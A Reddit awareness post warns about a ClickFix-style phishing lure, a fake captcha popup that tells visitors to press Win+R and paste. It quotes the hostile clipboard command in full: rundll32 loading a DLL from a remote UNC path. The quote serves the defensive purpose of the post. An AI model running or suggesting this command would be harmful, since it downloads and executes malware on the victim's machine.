Login

u/Canadian-Brunette

PSA: New Wave of Phishing attempts lately: Fake Captcha or cloudflare forcing users to Win+R execute commands
▲ 0 r/AskNetsec

PSA: New Wave of Phishing attempts lately: Fake Captcha or cloudflare forcing users to Win+R execute commands

Just browsing normally and received a floating popup blocking screen.

It was a captcha, but instead of doing puzzles, it asked me to Windows + R and CTRL + V.

This is a screenshot : https://i.imgur.com/xnsReoP.png

It was my first time encountering such phishing attempt from an advertisement popup. I was immediately suspicious because it asked me to use Win key + R and CTRL + V.

Knowing keyboard shortcuts, that is telling me to paste something into run prompt. So I checked my clipboard and found this.

cmd /c "" start rundll32.exe \\master-system-data-core-wiki.wiki\7c881852-e522-4ce6-a104-6b8573c4a514\google.ct,#1

DO NOT RUN IT.

Posting it here for raising awareness

Did some research and found many other users ALSO encountered similar traps in 2026:

https://www.reddit.com/r/techsupport/comments/1qyvkhb/weird_cloudflare_verify_youre_human_asking_me_to/

https://www.ndtv.com/offbeat/techie-gets-scammed-by-fake-job-interview-involving-cloudflare-shares-details-11427821

https://www.itnews.com.au/news/clickfix-attack-tricks-users-into-hacking-themselves-acsc-warns-625692

And MANY more... some term it as ClickFix.

u/Canadian-Brunette — 2 days ago